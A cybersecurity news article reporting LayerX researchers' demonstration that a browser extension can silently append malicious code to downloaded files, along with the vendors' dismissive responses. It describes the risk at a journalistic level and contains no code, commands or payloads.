Any browser extension can secretly install malware, researchers demonstrate

Published: 5 March 2026
Chrome Firefox extensions deliver malware
Image by Cybernews.

A handy price tracker, ad blocker, AI chatbot, or any other extension can turn malicious overnight and secretly install malware. Security researchers have demonstrated that extensions can modify every downloaded file without requiring permissions, and neither Google nor Mozilla sees a problem.

LayerX Security researchers warn that browser extensions have a massive security blind spot.

“An extension, by the mere act of downloading it, is granted enormous implicit power,” they said.

ADVERTISEMENT

“Any extension can be weaponized to install malware on target hosts.”

Yet, many users still see them as harmless add-ons, living somewhere between bookmarks and settings, isolated by the browser's sandbox environment.

jurgita justinasv Izabelė Pukėnaitė vilius Ernestas Naprys Gintaras Radauskas
Don't miss our latest stories on Google News. Add us as your Preferred Source on Google
Follow us

To demonstrate the danger, the researchers crafted their own Chrome extension. If the user downloads and opens any file from legitimate and trusted sources, it’s already too late.

The video in the report showcases a Chrome user with “Totally Innocent Extension” installed.

They visit the legitimate Spotify website and download the music streaming app. The user then clicks on the downloaded file, expecting to start the install – the calculator app pops up. At this point in a real attack, the system would already be compromised.

“In our demonstration, the payload simply opens the calculator app as a benign visual indicator. In a real-world scenario, it could enable persistence, lateral movement, data exfiltration, or full remote control of the machine,” said Iyar Segev, a security researcher at LayerX.

Has my data been leaked?
Check Now

The proof-of-concept (POC) extension edits every downloaded file, appending a hidden script.

ADVERTISEMENT

This requires surprisingly little code and triggers no warnings. A single line command can fetch and run the malware from an attacker-controlled server.

“We built an extension that silently modifies every file download initiated from any website. The user clicks a legitimate download link on a trusted domain, using a browser they trust. The file downloads exactly as expected.

How does it work?

Browser extensions have content scripts enabled by default. These scripts access and modify web pages and are the core of most extensions’ functionality.

“At first glance, this seems reasonable. Extensions need to modify pages to add features, inject UI elements, or enhance workflows. In fact, this is their whole design goal,” the researchers explain.

However, if extensions can alter websites, attackers can exploit this to turn any legitimate website into an attack surface, invisibly and at scale.

Extension Malware Download Flow
Image by LayerX.

“Without breaking the original application, without triggering warnings, and without requiring any additional permissions, the extension appends attacker-controlled code to every downloaded executable. The original program still runs normally, and the user sees exactly what they expect. From there, it’s game over,” Segev said.

This method allows the extension to effectively break out of the browser’s sandbox.

Attackers would still need to compromise the extension itself, which has happened frequently in the past. Researchers routinely discover malicious extensions in official add-on stores. The extensions often turn malicious after changing hands and receiving seemingly routine updates. Users see no reliable signal that anything suspicious has happened.

ADVERTISEMENT

Google or Mozilla won’t fix this

LayerX reported the findings to major browsers. However, the responses were lackluster.

The report quotes Google stating that “social engineering attacks are out of scope for the Chrome threat model.”

Chrome extensions are asking for too many dangerous permissions
Image by Cybernews.

Users are being tricked into installing malware themselves.

Meanwhile, Mozilla replied that “when you grant an extension access to all websites, it can modify the content of websites, including changing the destinations of links.”

However, the researchers believe that the current extension security model lacks a proper explanation of the impact an untrusted extension has on their browsing experience and the security of the entire system.

Cybernews has previously reported on the dangers of extensions – they “see everything,” and the entire supply chain is vulnerable to attackers.

“There are innumerable ways in which extensions can be exploited to bypass user trust. The browser has quietly become a primary execution environment, a distribution channel, and a control plane, while remaining largely unmonitored by traditional security tools. Extensions sit at the intersection of user trust and system-level impact,” the LayerX researcher concluded.

ADVERTISEMENT

Unlock more exclusive Cybernews content on YouTube.

Share
Post
Share
Share
Share
More from Cybernews
By participating in this viral trend, you help train AI where it struggles the most
Windows hibernation may contribute to SSD wear as storage costs rise
UFO skeptic Michael Shermer apologizes to David Grusch
Man tries to make a sale on Facebook Marketplace, gets scammed out of $300 via Zelle
Critical FFmpeg flaw discovered: just watching a video can fully compromise your system
The world's top intelligence alliance: AI could supercharge cyberattacks within months
ADVERTISEMENT